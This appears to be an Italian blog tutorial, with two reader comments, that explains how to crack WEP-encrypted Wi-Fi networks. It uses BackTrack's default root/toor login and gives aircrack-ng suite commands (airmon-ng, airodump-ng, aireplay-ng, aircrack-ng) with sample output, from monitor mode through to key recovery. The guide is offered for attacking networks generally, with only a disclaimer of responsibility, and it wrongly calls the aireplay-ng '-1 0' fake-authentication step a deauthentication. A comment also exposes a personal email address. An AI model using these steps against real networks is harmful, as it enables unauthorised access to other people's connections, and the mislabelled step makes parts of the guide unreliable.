Ecco una piccola guida su come crackare reti wireless con cifratura WEP.
Non mi resta che augurarvi buona lettura =).
ATTENZIONE!L'AUTORE DELLA GUIDA(GHEBBO_HCK) NON SI ASSUNE NESSUNA RESPONSABILITA' DELL'USO INAPPROPRIATO DELLE INFORMAZIONI QUI CONTENUTE.
In questo articolo illustrerò come crackare reti wireless protette da una cifratura "WEP".
Il primo passo consiste nel precurarsi "BackTrack4" (o anche "BackTrack3").
Ora,dopo aver scaricato la .ISO,masterizzate il tutto e attendete(ma va??)il completamento della masterizzazione.(scarica BackTrack!)
Fatto questo riavviate il computer e inserite il disco nel lettore CD/DVD per far partire il "LiveCD*".
Se il "LiveCD" non parte cambiate l'ordine delle peroferiche e mettete per primo il lettore CD/DVD,poi il "LiveCD"
dovrebbe partire...
Partito il LiveCD selezionate l'opzione più adatta alle vostre esigenze e,appena permesso, digitate "startx**" per
far partire l'interfaccia grafica di BackTrack.
Se necessario e se richiesto inserite i seguenti dati di LOGIN:
USERNAME:root
PASSWORD:toor
*LiveCD:Un CD/DVD che contiente un SO*** eseguibile,senza aver bisogno di alcuna installazione.
**StartX:Comando per far partire l'interfaccia grafica.
***SO:Sistema Operativo
Ora clickate sull'icona della konsole o premete ALT+F2 e digitate "konsole".
Per poter effettuare con successo il "crack" della rete abbiamo bisogno di far partire la "monitor mode*" quindi digitate:
airmon-ng
E vi dovrebbero comparire tutte le periferiche disponibili.
Ora digitate :
airmon-ng start <nome interfaccia>
Ovviamente al posto di <nome interfaccia> dovete mettere il nome della vostra interfaccia.
Ma cosa abbiamo fatto?
airmon-ng è l'applicazione che gestisce le interfaccie.
start è il comando.
interfaccia credo si capisca.
*Monitor Mode:E' la modalità della scheda che (in poche e rozze parole) serve ad abilitare l'injection.
Ecco finalmente un po di "azione" =).
Digitate il comando:
airodump-ng <nome interfaccia>
e dovrebbe uscire una cosa del genere:
CH 7 ][BAT 3 hour 30 mins ][Elapsed: 0 s][2010-09-11 21:44
BSSID PWR Beacons #Data #/s CH MB ENC CHIHPER AUTH ESSID
ab:cd:ef:gh:il:mn -30 1 0 0 11 54 WEP WEP OPN CrackMe
Ora aspettate di vedere la vostra connessione e premete CTRL+C(carattere di escape).
Copiato il BSSID della rete che vogliamo attaccare digitiamo:
airodump-ng -w <filename> -c <channel> --bssid <incolliamo il BSSID> <nome interfaccia>
Prima di continuare vi spiegherò (ancora una volta) cosa abbiamo fatto:
airodump-ng è l'applicazione per "cercare" le reti e "catturare" i pacchetti.
<nome interfaccia> è l'interfaccia da dove "cercare" e "catturare".
Poi:
airodump-ng come prima.
-w <filename> è l'opzione di airodump che serve a salvare i pacchetti catturati sul file indicato(<filename>).
-c <channel> è l'opzione di airodump che serve ad indicare su qualce canale "cercare/catturare".
--bssid <bssid> serve ad indicare da quale connessione "catturare" i pacchetti.
<nome interfaccia> come prima.
Ecco fatto!Ora stiamo catturando i pacchetti...
Ma non è finità qui...
Ora "velocizziamo" le cose:generiamo traffico e velocizziamo la ricezione dei pacchetti =).
Per questo nobile (si fa per dire =P ) scopo c'è aireplay-ng.
Quindi aprite una nuova Konsole e digitate:
aireplay-ng -9 <nome interfaccia>
Questo comando serve a testare che la scheda sia adatta all'injection.
aireplay-ng -1 0 -a <bssid> <nome interfaccia>
Dove:
aireplay-ng è l'applicazione.
-1 0 indica che bisogna effettuare una deautenticazione.
-a <bssid> è il bersaglio.
<nome intefaccia> è l'interfaccia da usare.
Dovrebbe uscire una schermata che dice:
Read <numero di pacchetti>(got <numero> ARP request,<numero> ACKs)
Ora non ci resta che aspettare che:
CH 7 ][BAT 3 hour 30 mins ][Elapsed: 0 s][2010-09-11 21:44
BSSID PWR Beacons #Data #/s CH MB ENC CHIHPER AUTH ESSID
ab:cd:ef:gh:il:mn -30 1 0 0 11 54 WEP WEP OPN CrackMe
la parte #Data arrivi a (circa) 30000 a che le ARP request e gli ACKs inizino ad aumentare in modo esponenziale
e...CRACK!!!
Digitate:
aircrack-ng <filename>*.cap
Dove:
aircrack è l'applicazione per crackare.
<filename>*.cap è il file dove,precedentemente (con airodump), abbiamo salvato
i pacchetti.
Ora solo un po di pazienza e il programma dovrebbe visualizzare:
KEY FOUND![12:34:56:78] ASCII:prova
In caso non visualizzi la parte "ASCII:prova" la password è quella tra le parentesi quadre,ovviamente, senza i ':'.
Spero che la guida sia stata soddisfacente =)!
E,mi raccomando,se ho sbagliato qualche cosa vi prego di segnalarmelo,provvederò subito!
Gabri sono andrea l amico di emanuele potresti lasciarmi la tua e mail?
RispondiEliminaPuoi contattarmi all indirizzo: lamonacaandrea@virgilio.it
RispondiElimina